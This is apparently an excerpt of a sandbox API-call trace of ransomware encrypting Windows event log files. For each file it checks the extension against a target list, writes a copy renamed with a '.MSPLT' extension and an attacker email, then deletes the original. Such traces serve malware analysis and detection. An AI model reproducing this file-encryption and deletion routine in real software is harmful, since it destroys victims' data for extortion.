[0291.346] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.346] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.346] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.346] lstrlenW (lpString=".doc") returned 4 [0291.346] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.346] lstrlenW (lpString=".docx") returned 5 [0291.346] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.346] lstrlenW (lpString=".pdf") returned 4 [0291.346] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.346] lstrlenW (lpString=".xls") returned 4 [0291.346] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.347] lstrlenW (lpString=".xlsx") returned 5 [0291.347] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.347] lstrlenW (lpString=".ppt") returned 4 [0291.347] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.347] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.347] lstrlenW (lpString=".zip") returned 4 [0291.347] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.347] lstrlenW (lpString=".rar") returned 4 [0291.347] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.347] lstrlenW (lpString=".bz2") returned 4 [0291.347] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.347] lstrlenW (lpString=".7z") returned 3 [0291.347] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.347] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.347] lstrlenW (lpString=".dbf") returned 4 [0291.347] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.347] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.347] lstrlenW (lpString=".1cd") returned 4 [0291.347] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.347] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0291.347] lstrlenW (lpString=".jpg") returned 4 [0291.347] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.348] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0291.348] lstrlenW (lpString="Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 48 [0291.348] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0291.348] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=1052672) returned 1 [0291.348] CloseHandle (hObject=0x3e4) returned 1 [0291.348] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx")) returned 0x20 [0291.348] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.349] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0291.349] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.349] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.349] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0291.437] GetLastError () returned 0x0 [0291.437] ReadFile (in: hFile=0x3e4, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0291.519] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0291.661] ReadFile (in: hFile=0x3e4, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x1010, lpOverlapped=0x0) returned 1 [0291.671] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1020, lpOverlapped=0x0) returned 1 [0291.675] ReadFile (in: hFile=0x3e4, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0291.675] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x134, lpOverlapped=0x0) returned 1 [0291.675] SetEndOfFile (hFile=0x3d0) returned 1 [0291.675] CloseHandle (hObject=0x3d0) returned 1 [0291.996] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.996] SetEndOfFile (hFile=0x3e4) returned 1 [0291.998] CloseHandle (hObject=0x3e4) returned 1 [0291.998] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0291.999] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx")) returned 1 [0291.999] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0291.999] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0291.999] lstrlenW (lpString=".doc") returned 4 [0291.999] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.999] lstrlenW (lpString=".docx") returned 5 [0291.999] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.999] lstrlenW (lpString=".pdf") returned 4 [0291.999] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.999] lstrlenW (lpString=".xls") returned 4 [0292.000] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.000] lstrlenW (lpString=".xlsx") returned 5 [0292.000] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.000] lstrlenW (lpString=".ppt") returned 4 [0292.000] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.000] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0292.000] lstrlenW (lpString=".zip") returned 4 [0292.000] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.000] lstrlenW (lpString=".rar") returned 4 [0292.000] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.000] lstrlenW (lpString=".bz2") returned 4 [0292.000] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.000] lstrlenW (lpString=".7z") returned 3 [0292.000] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.000] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0292.000] lstrlenW (lpString=".dbf") returned 4 [0292.000] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.000] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0292.001] lstrlenW (lpString=".1cd") returned 4 [0292.001] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.001] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0292.001] lstrlenW (lpString=".jpg") returned 4 [0292.001] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.001] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0292.001] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0292.001] lstrlenW (lpString=".doc") returned 4 [0292.001] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.001] lstrlenW (lpString=".docx") returned 5 [0292.001] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.001] lstrlenW (lpString=".pdf") returned 4 [0292.001] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.001] lstrlenW (lpString=".xls") returned 4 [0292.001] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.002] lstrlenW (lpString=".xlsx") returned 5 [0292.002] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.002] lstrlenW (lpString=".ppt") returned 4 [0292.002] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.002] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0292.002] lstrlenW (lpString=".zip") returned 4 [0292.002] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.002] lstrlenW (lpString=".rar") returned 4 [0292.002] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.002] lstrlenW (lpString=".bz2") returned 4 [0292.002] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.002] lstrlenW (lpString=".7z") returned 3 [0292.002] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.002] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0292.002] lstrlenW (lpString=".dbf") returned 4 [0292.002] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.002] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0292.002] lstrlenW (lpString=".1cd") returned 4 [0292.003] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.003] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0292.003] lstrlenW (lpString=".jpg") returned 4 [0292.003] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.003] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.003] lstrlenW (lpString="Microsoft-Windows-MUI%4Operational.evtx") returned 39 [0292.003] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0292.444] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0292.444] CloseHandle (hObject=0x45c) returned 1 [0292.445] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx")) returned 0x20 [0292.445] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.445] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0292.445] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.445] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.445] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0292.447] GetLastError () returned 0x0 [0292.447] ReadFile (in: hFile=0x45c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.453] WriteFile (in: hFile=0x448, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.460] ReadFile (in: hFile=0x45c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.460] WriteFile (in: hFile=0x448, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x122, lpOverlapped=0x0) returned 1 [0292.460] SetEndOfFile (hFile=0x448) returned 1 [0292.460] CloseHandle (hObject=0x448) returned 1 [0292.464] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.464] SetEndOfFile (hFile=0x45c) returned 1 [0292.466] CloseHandle (hObject=0x45c) returned 1 [0292.466] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.466] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx")) returned 1 [0292.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.467] lstrlenW (lpString=".doc") returned 4 [0292.467] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.467] lstrlenW (lpString=".docx") returned 5 [0292.467] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.467] lstrlenW (lpString=".pdf") returned 4 [0292.467] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.467] lstrlenW (lpString=".xls") returned 4 [0292.467] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.467] lstrlenW (lpString=".xlsx") returned 5 [0292.467] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.467] lstrlenW (lpString=".ppt") returned 4 [0292.467] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.467] lstrlenW (lpString=".zip") returned 4 [0292.467] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.467] lstrlenW (lpString=".rar") returned 4 [0292.467] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.467] lstrlenW (lpString=".bz2") returned 4 [0292.467] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.467] lstrlenW (lpString=".7z") returned 3 [0292.467] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.467] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.467] lstrlenW (lpString=".dbf") returned 4 [0292.467] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.468] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.468] lstrlenW (lpString=".1cd") returned 4 [0292.468] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.468] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.468] lstrlenW (lpString=".jpg") returned 4 [0292.468] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.468] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.468] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.468] lstrlenW (lpString=".doc") returned 4 [0292.468] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.468] lstrlenW (lpString=".docx") returned 5 [0292.468] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.468] lstrlenW (lpString=".pdf") returned 4 [0292.468] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.468] lstrlenW (lpString=".xls") returned 4 [0292.468] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.468] lstrlenW (lpString=".xlsx") returned 5 [0292.468] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.468] lstrlenW (lpString=".ppt") returned 4 [0292.468] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.469] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.469] lstrlenW (lpString=".zip") returned 4 [0292.469] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.469] lstrlenW (lpString=".rar") returned 4 [0292.469] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.469] lstrlenW (lpString=".bz2") returned 4 [0292.469] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.469] lstrlenW (lpString=".7z") returned 3 [0292.469] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.469] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.469] lstrlenW (lpString=".dbf") returned 4 [0292.469] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.469] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.469] lstrlenW (lpString=".1cd") returned 4 [0292.469] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.469] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0292.469] lstrlenW (lpString=".jpg") returned 4 [0292.469] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.469] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.469] lstrlenW (lpString="Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 50 [0292.469] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0292.470] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0292.470] CloseHandle (hObject=0x45c) returned 1 [0292.470] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx")) returned 0x20 [0292.470] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.470] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0292.470] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.470] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.470] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0292.472] GetLastError () returned 0x0 [0292.472] ReadFile (in: hFile=0x45c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.477] WriteFile (in: hFile=0x448, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.480] ReadFile (in: hFile=0x45c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.480] WriteFile (in: hFile=0x448, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x138, lpOverlapped=0x0) returned 1 [0292.480] SetEndOfFile (hFile=0x448) returned 1 [0292.480] CloseHandle (hObject=0x448) returned 1 [0292.485] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.485] SetEndOfFile (hFile=0x45c) returned 1 [0292.487] CloseHandle (hObject=0x45c) returned 1 [0292.487] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.487] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx")) returned 1 [0292.488] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.488] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.488] lstrlenW (lpString=".doc") returned 4 [0292.488] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.488] lstrlenW (lpString=".docx") returned 5 [0292.488] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.488] lstrlenW (lpString=".pdf") returned 4 [0292.488] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.488] lstrlenW (lpString=".xls") returned 4 [0292.488] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.488] lstrlenW (lpString=".xlsx") returned 5 [0292.488] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.488] lstrlenW (lpString=".ppt") returned 4 [0292.488] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.488] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.488] lstrlenW (lpString=".zip") returned 4 [0292.488] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.488] lstrlenW (lpString=".rar") returned 4 [0292.488] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.488] lstrlenW (lpString=".bz2") returned 4 [0292.559] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.559] lstrlenW (lpString=".7z") returned 3 [0292.559] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.559] lstrlenW (lpString=".dbf") returned 4 [0292.559] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.559] lstrlenW (lpString=".1cd") returned 4 [0292.559] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.559] lstrlenW (lpString=".jpg") returned 4 [0292.559] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.559] lstrlenW (lpString=".doc") returned 4 [0292.560] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.560] lstrlenW (lpString=".docx") returned 5 [0292.560] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.560] lstrlenW (lpString=".pdf") returned 4 [0292.560] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.560] lstrlenW (lpString=".xls") returned 4 [0292.560] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.560] lstrlenW (lpString=".xlsx") returned 5 [0292.560] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.560] lstrlenW (lpString=".ppt") returned 4 [0292.560] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.560] lstrlenW (lpString=".zip") returned 4 [0292.560] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.560] 